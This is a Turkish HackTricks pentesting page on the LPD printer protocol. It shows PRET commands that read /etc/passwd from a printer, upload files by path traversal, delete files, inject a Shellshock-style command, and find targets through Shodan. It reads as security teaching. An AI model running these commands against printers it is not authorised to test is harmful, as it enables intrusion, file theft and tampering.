{% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ### **LPD Protokolüne Giriş** 1980'lerde, **Line Printer Daemon (LPD) protokolü** Berkeley Unix'te geliştirilmiş ve daha sonra RFC1179 ile resmileştirilmiştir. Bu protokol, `lpr` komutu aracılığıyla etkileşimlere olanak tanıyan 515/tcp portu üzerinden çalışır. LPD aracılığıyla yazdırmanın özü, **iş detaylarını ve kullanıcıyı belirtmek için** bir **kontrol dosyası** ile **yazdırma bilgilerini içeren** bir **veri dosyası** göndermeyi içerir. Kontrol dosyası, veri dosyası için **çeşitli dosya formatlarının** seçilmesine olanak tanırken, bu dosyaların işlenmesi belirli LPD uygulaması tarafından belirlenir. Unix benzeri sistemler için yaygın olarak tanınan bir uygulama **LPRng**'dir. Dikkate değer bir şekilde, LPD protokolü **kötü niyetli PostScript** veya **PJL yazdırma işleri** yürütmek için istismar edilebilir. ### **LPD Yazıcıları ile Etkileşim İçin Araçlar** [**PRET**](https://github.com/RUB-NDS/PRET), LPD uyumlu yazıcılarla etkileşim için `lpdprint` ve `lpdtest` adlı iki temel aracı tanıtır ve bu araçlar, yazıcıda veri yazdırmaktan dosyaları indirme, yükleme veya silme gibi bir dizi eylemi gerçekleştirmek için basit bir yöntem sunar: ```python # To print a file to an LPD printer lpdprint.py hostname filename # To get a file from the printer lpdtest.py hostname get /etc/passwd # To upload a file to the printer lpdtest.py hostname put ../../etc/passwd # To remove a file from the printer lpdtest.py hostname rm /some/file/on/printer # To execute a command injection on the printer lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' # To send a mail through the printer lpdtest.py hostname mail lpdtest@mailhost.local ``` Baskı **hacking** dünyasını daha fazla keşfetmekle ilgilenen bireyler için kapsamlı bir kaynak burada bulunabilir: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). # Shodan * `port 515` {% hint style="success" %} AWS Hacking öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCP Hacking öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks'i Destekleyin * [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! * **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.** * **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
{% endhint %}